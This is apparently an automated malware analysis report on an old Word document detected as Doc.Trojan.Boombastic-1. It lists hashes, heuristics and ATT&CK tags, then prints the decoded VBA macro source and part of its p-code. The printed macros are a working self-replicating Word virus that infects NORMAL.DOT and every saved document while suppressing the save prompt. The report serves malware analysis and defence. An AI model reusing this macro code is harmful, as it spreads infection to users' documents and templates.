Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 43966fea7f66ca25…

MALICIOUS

Office (OLE)

44.0 KB Created: 1999-03-18 19:25:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3a6b992e5d92af0ecd13d2ce81760425 SHA-1: ce5b381ec31ebaa15f8c914f31c5088948a2d3ab SHA-256: 43966fea7f66ca252f27715b424cb06dad8b553aee86a1342a5d110894dc21e3
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro. The macro attempts to save the document in a macro-enabled format and uses the WordBasic Organizer to copy several macros ('AutoOpen', 'DateiSpeichernUnter', 'System', 'AutoExec') into the new document, indicating an attempt to establish persistence or execute further malicious actions. The ClamAV detection 'Doc.Trojan.Boombastic-1' further supports its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Boombastic-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Boombastic-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9899 bytes
SHA-256: 30f9f97e4c928b01560dfc6f04211e9e48835baa938a3b1ef506d3efdfe5efc5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "DateiSpeichernUnter"

Public Sub MAIN()
Dim formatnr
Dim Datname$
Dim Anzahl
Rem Only a test, but a good one, from Mr. Boombastic and Sir WIXALOT !!!
On Error GoTo -1: On Error GoTo ciao
WordBasic.ToolsOptionsSave FastSaves:=1, GlobalDotPrompt:=0
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
formatnr = dlg.Format
If formatnr = 0 Or 1 Or 6 Then
    Datname$ = dlg.Name
    dlg.Format = 1
        WordBasic.FileSaveAs dlg
        For Anzahl = 1 To WordBasic.CountMacros(1, 0, 0)
                If WordBasic.[MacroName$](Anzahl, 1) = "System" Then GoTo ciao
        Next Anzahl
        WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Destination:=Datname$, Name:="AutoOpen", Tab:=3
        WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Destination:=Datname$, Name:="DateiSpeichernUnter", Tab:=3
        WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Destination:=Datname$, Name:="System", Tab:=3
        WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Destination:=Datname$, Name:="AutoExec", Tab:=3
    If WordBasic.IsDocumentDirty() = -1 Then WordBasic.FileSave
Else
    WordBasic.FileSaveAs dlg
End If
ciao:
WordBasic.Call "AutoExec"
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim Anzahl
Rem Mr. Boombastic and Sir WIXALOT !!!
On Error Resume Next
WordBasic.ToolsOptionsSave FastSaves:=1, GlobalDotPrompt:=0
    For Anzahl = 1 To WordBasic.CountMacros(0)
        If WordBasic.[MacroName$](Anzahl, 0) = "System" Then GoTo ciao
    Next Anzahl
    WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](0), Destination:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="AutoOpen", Tab:=3
    WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](0), Destination:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="DateiSpeichernUnter", Tab:=3
    WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](0), Destination:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="System", Tab:=3
    WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](0), Destination:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="AutoExec", Tab:=3
ciao:
WordBasic.Call "AutoExec"
End Sub

Attribute VB_Name = "AutoExec"

Public Sub MAIN()
Dim wert$
Rem Mr. Boombastic and Sir WIXALOT !!!
On Error Resume Next
WordBasic.ToolsOptionsSave FastSaves:=1, GlobalDotPrompt:=0
wert$ = "13:13:13"
WordBasic.OnTime wert$, "System", 30
End Sub

' Processing file: /opt/analyzer/scan_staging/e6667bb8d91142058b9b195746091d8c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1184 bytes
' Macros/VBA/DateiSpeichernUnter - 2932 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Dim 
' 	VarDefn formatnr
' Line #3:
' 	Dim 
' 	VarDefn Datname
' Line #4:
' 	Dim 
' 	VarDefn Anzahl
' Line #5:
' 	Rem 0x0045 " Only a test, but a good one, from Mr. Boombastic and Sir WIXALOT !!!"
' Line #6:
' 	OnError <crash> 
' 	BoS 0x0000 
' 	OnError ciao 
' Line #7:
' 	LitDI2 0x0001 
' 	ParamNamed FastSaves 
' 	LitDI2 0x0000 
' 	ParamNamed GlobalDotPrompt 
' 	Ld WordBasic 
' 	ArgsMemCall ToolsOptionsSave 0x0002 
' Line #8:
' 	Dim 
' 	VarDefn dlg (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitVarSpecial (False)
' 	Ld WordBasic 
' 	MemLd DialogRecord 
' 	ArgsMemLd FileSaveAs 0x0001 
' 	Set dlg 
' Line #9:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd CurValues 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #10:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd Dialog 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #11:
' 	Ld dlg 
' 	MemLd Format$ 
' 	St fo
... (truncated)